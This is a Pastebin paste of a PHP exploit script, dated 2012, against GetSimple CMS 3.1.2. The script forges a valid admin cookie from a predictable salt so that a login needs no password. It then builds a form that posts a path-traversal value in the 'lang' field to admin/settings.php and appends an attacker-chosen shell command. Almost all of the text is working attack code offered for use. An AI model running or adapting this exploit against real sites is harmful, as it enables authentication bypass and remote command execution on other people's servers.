Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- // --------------------------------
- // iHaiHa-vs-hosting2rce.php
- // --------------------------------
- // 26.12.2o12
- //
- // Specjal thanks to ihaiha team for
- // 'point of view'.
- //
- // cookie() grepped from GetSimple 3.1.2, THANKS! ;]
- // just for 'knowing the cookie'.
- function create_cookie() {
- global $USR,$SALT,$cookie_time,$cookie_name;
- $saltUSR = $USR.$SALT;
- $saltCOOKIE = sha1($cookie_name.$SALT);
- setcookie($saltCOOKIE, sha1($saltUSR), time() + $cookie_time,'/');
- setcookie('GS_ADMIN_USERNAME', $USR, time() + $cookie_time,'/');
- }
- // get-IT-simple-ihaiha-kod-yeah
- function getsimple_cookie(){
- // potrzebujemy:
- $authenticated = true;
- $USR = 'admin'; //$_POST['userid']; // admin?
- $ver_no_clean = '3.1.2';
- $SITEURL = '/your/GetSimple_3.1.2/admin/settings.php'; //$_POST['siteurl'];
- $SALT = sha1($SITEURL);
- $cookie_time = '7200';
- $site_full_name = 'GetSimple';
- $name_url_clean = strtolower(str_replace(' ','-',$site_full_name));
- $cookie_name = strtolower($name_url_clean) .'_cookie_'. $ver_no_clean;
- echo 'It should be interesting that we can (re)generate valid cookie<br>';
- echo 'and login without password, right? <br><br><b>Generated cookie: ';
- echo $cookie_name . '<br></b>';
- echo '<br>Anyway: this simple code exploits vulnerability in :<br>';
- echo '<b>admin/settings.php</b>:';
- if( $authenticated ) {
- # YES - set the login cookie, then redirect user to secure panel
- // create_cookie();
- setcookie('GS_ADMIN_USERNAME', $USR, time() + 3600,'/');
- echo '<form method="post" action="'. $SITEURL .'">';
- echo '<input type="hidden" name="username" value="' . $USR . '">';
- echo '<input type="hidden" name="pwd" value="ihaihaiha">'; // sample; as a hardcoded (wrong anyway) pass
- echo '<input type="hidden" name="lang" value="en_US/../../../../../../../../../../tmp/&cmd='.$_POST['cmd'].'">';
- echo '<br>So add come cmd: <br>';
- echo 'cmd: <input type="text" name="cmd">';
- echo '<input type="submit" value="teraz">';
- } else {
- echo 'Nope. :C';
- }
- } // end of getsimple_cookie()
- getsimple_cookie();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement